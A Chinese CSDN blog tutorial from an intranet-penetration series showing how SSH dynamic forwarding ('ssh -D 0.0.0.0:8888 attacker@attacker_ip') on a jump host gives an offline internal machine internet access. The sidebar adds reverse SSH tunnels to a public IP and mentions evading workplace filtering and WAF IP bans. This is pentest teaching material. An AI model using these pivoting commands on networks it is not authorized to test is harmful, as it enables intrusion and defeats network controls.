内网渗透之代理转发(7)--把内网不能上网主机反代上网

最新推荐文章于 2023-08-05 22:30:00 发布
最新推荐文章于 2023-08-05 22:30:00 发布
阅读量397 收藏 3
点赞数 1
分类专栏: 内网渗透之代理转发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/118732414
版权
本文介绍了如何通过SSH命令实现网络环境中的流量转发,以创建代理连接。通过在跳板机上执行`ssh -D 0.0.0.0:8888 attacker@attacker_ip`命令,可以将本地流量转发到攻击者的网络环境中。同时,也在Kali Linux系统中配置了代理,以便在无法直接上网的情况下通过中间跳板机进行网络访问。整个过程强调了保持在同一网段的重要性,并且提到了在浏览器中设置代理的选项。
摘要由CSDN通过智能技术生成

现在是我们的网络环境
在这里插入图片描述
这里由于便于环境搭建,我使用了跳板作为过渡,如果没有跳板的话也类似
之前我们入侵的时候是从attacker往电脑走
当然我们也可以反向操作
但一定要注意,正向和反向同一个主机可能对应的ip不一样(别忘了我们的原则同一个网段)
如果我们可以把电脑代理到attacker的网络环境里,那么我们就可以直接上网了
那么我们现在可以在跳板机上执行命令
ssh -D 0.0.0.0:8888 attacker@attacker_ip
这个命令执行效果就是我在跳板上开启8888的端口,流量会被直接转发到attacker的网络环境
开始验证
在这里插入图片描述
现在kali无法上网
下面开始反代,上到中间的跳板机
ssh -N -f -D 0.0.0.0:8888 username@ip
这里我们attacker的ip在跳板看来是192.168.1.1
在这里插入图片描述

下面再kali上配置代理
不过可以直接去浏览器测试
在这里插入图片描述
插件配置代理
在这里插入图片描述
还是老的原则,在一个网段
在这里插入图片描述
神奇吗
就是这么简单

azraelxuemo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
skynet使用json收发数据
gdut17的博客
09-12 921
skynet api 常用的api skynet.newservice skynet.fork skynet.start skynet.dispatch socket.listen socket.start socket.read,write(require "socket") !!! socket.recv,send(require "client.socket") cjson.decode cjson.encode main.lua --[[ 常用的api skynet.newservice
Flask并发
u010851059的博客
05-08 2825
实现 Flask 应用的高并发 Gunicorn + Flask App 安装 Gunicorn 和 gevent: pip install gunicorn pip install gevent 对 I/O 密集型的任务,采用 workers + gevent 的方式: gunicorn run_server:app -w 9 -b 0.0.0.0:8888 -k gevent 对 CPU 密集型的任务,采用 workers: gunicorn run_server:app -w 9 -b 0.
IDEA 远程调试服务器代码
科技之星==================>Future
09-07 549
IDEA 远程调试服务器代码 我们在开发项目中,我们边把代码发布到测试环境,边在本地开发新的功能;有时候测试人员在测试时,发现了Bug,我们只有让运维人员将线上运行产生的日志文件发给我们排查。这样的一种排除Bug方式,效率极其低下。好在IDEA有一种远程调试的功能,可以完美解决这个需求。 远程调试的代码发布方式有两种(jar包部署 或者 war包部署) 1.JAR包部署 1.首先将项目打成jar包。注意:pom.xml 中 <packaging>jar</packaging
TCP-服务器监听
qq_43187004的博客
10-19 4639
package main import ( “fmt” “net” ) func process(conn net.Conn) { //这里我们循环的接收客户端发送的数据 defer conn.Close()//关闭conn for{ //创建一个新的切片 buf := make([]byte,1024) //conn.Read(buf) //1.等待客户端通过conn发送信息 //2.如果客户...
Nginx启动报错- Failed to start The nginx HTTP and reverse proxy server
IT小辉同学
08-05 2024
有趣的人才适合做朋友!!!
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
agent内网渗透代理相关
最新发布
04-14
内网渗透代理
036-内网渗透代理转发.pdf
09-20
036-内网渗透代理转发.pdf
Go-简单的反向代理用于内网穿透
08-14
在IT行业中,内网穿透是一项重要的技术,它允许外部网络访问到内网中的服务或设备。Go语言,作为一种高效、轻量级的编程语言,因其强大的网络编程能力,常被用来构建这样的工具。本篇文章将深入探讨如何使用Go语言...
自建私有云服务+内网转外网端口映射数据转发+代理服务tfcenter-windows-1.43
05-13
(7) 支持centos7、ubuntu18和windows10系统 (8) 浏览器管理本地文件管理 (9) 新增本地文件管理功能-收藏和分享链接 (10) 支持树莓派 (11) 支持手机端浏览器操作 (12) 支持常见的文件、视频、文档pdf使用浏览器在线...
内网渗透代理转发(6)--内网环境代理到公网
azraelxuemo的博客
07-14 454
下面开始进阶 上一小节我们成功的把内网的机子的22端口映射到公网上,那么我们可否把内网环境直接映射出来? 当然是可以的 还是老命令 在内网机器上执行 ssh -N -f -R 2222:0.0.0.0:8888 root@35.105.217.123 这里直接-N -f 这样执行完之后我们还在内网机子上 但是光这样不行 我们内网机子没有开8888端口 那么我们需要开启8888端口并且要把经过8888端口的流量转发内网环境 这个时候用到-D命令 ssh -D 8888 root@127.0.0.1 可以
ListenAndServe: listen tcp 0.0.0.0:8888: bind: address already in use
ailian_f的博客
09-09 4306
问题解决方案: sudo lsof -i:8888 kill 12506 (kill 对应的PID) 问题解决,重新运行需要执行的文件即可
client 和 server 在本地进行交互 网络编程 golang实现
weixin_45193103的博客
03-22 1319
server端的实现: package main import ( "fmt" "net" //做网络socket开发时,net包含有我们需要所有的方法和函数 ) func main() { fmt.Println("服务器开始监听。。。") //1.第一个参数tcp表示网络协议是tcp //2.第二个参数0.0.0.0:8888 表示在本地监听8888端口 listen, err := net.Listen("tcp", "0.0.0.0:8888") if err != nil .
127.0.0.1和0.0.0.0
热门推荐
认知 行动 坚持
03-24 1万+
先说0.0.0.0吧, 他是本机上所有IP的集合。 而127.0.0.1是本机的环回地址,我要说,这就是个鸡肋。       假设PC1(client)的IP为192.168.1.105, PC2(server)的IP为192.168.1.106, 现在考虑网络编程。       pc1去连接 127.0.0.1:8888,     pc2监听0.0.0.0:8888,   连个鸟啊,
windows server后台运行jar文件配置方法
知识空间
12-07 2044
使用如下命令保存为run-server.bat @echo off start xxx-server -jar D:\xxx-server-0.0.1-SNAPSHOT.jar exit 找到java.exe路径,复制路径下的javaw.exe(注意不是java.exe),重命名为上面定义的xxx-server 双击运行run-server.bat即可运行 查看是否运行成功命令: netstat -anot | findstr 8888 显示结果如下: TCP 0.0.0.0:8888 .
Redhat/Centos ssh 修改默认端口不成功解决办法
gongshijun1的博客
07-24 3143
最近工作需要,需要安装redhat 6.6,以及centos7.6,然后开通服务器外网ssh访问。由于默认端口容易遭受攻击,因此需要修改默认的端口号。如改为8888。以下内容,是本人在修改端口中,碰到一些问题,希望能给大家参考。 1. 首先,修改ssh默认端口,这个估计都知道,编辑 /etc/ssh/sshd_config, 添加 Port 8888。 vi /etc/ssh/sshd_co...
ssh代理使用场景(1)--绕过上网限制
azraelxuemo的博客
10-13 745
公司屏蔽了csdn,简书 不太懂 但有需要内网环境 所以可以利用代理切换,内网的时候直接连接 外网就代理 条件 需要一个vps 执行以下命令 ssh -D 0.0.0.0:8888 root@vps_ip 8888可以修改为任意端口 vps_ip就是你的外网ip 然后可以利用proxyswitch配置代理 然后就可以正常访问了 ...
通过ssh反向代理解决服务器没网的问题
zkkksssss的博客
03-19 2703
通过ssh反向代理解决服务器没网的问题。利用ssh的反向代理,命令是ssh -R,让服务器发出的请求通过ssh反向代理转发到本地的socket5服务器上去,如此服务器即可联网。
WAF攻防—绕过IP封锁(代理池)
剁椒鱼头没剁椒的博客
03-09 2858
这篇文章主要是将介绍在进行信息收集或者漏洞扫描等情况下,被WAF拦截了怎么办?被封锁IP了怎么办?可能更多的是被封锁IP,至于被WAF拦截,拦截的更多情况下是payload或者POC被拦截了。Web Application Firewall(web 应用防火墙),一种公认的说法是“web 应用防火墙”通过执行一系列针对 HTTP/HTTPS 的安全策略来专门为 web 应用提供保护的一款产品。
内网渗透技术:LCX、Htran、ReDuh端口转发实验详解
"该文档是关于内网渗透的实验手册,涵盖了LCX、Htran.exe和ReDuh等工具的端口转发实验,目的是教授如何进行内网渗透测试和搭建练习环境。" 在网络安全领域,内网渗透是评估组织安全防御能力的重要环节,通常涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值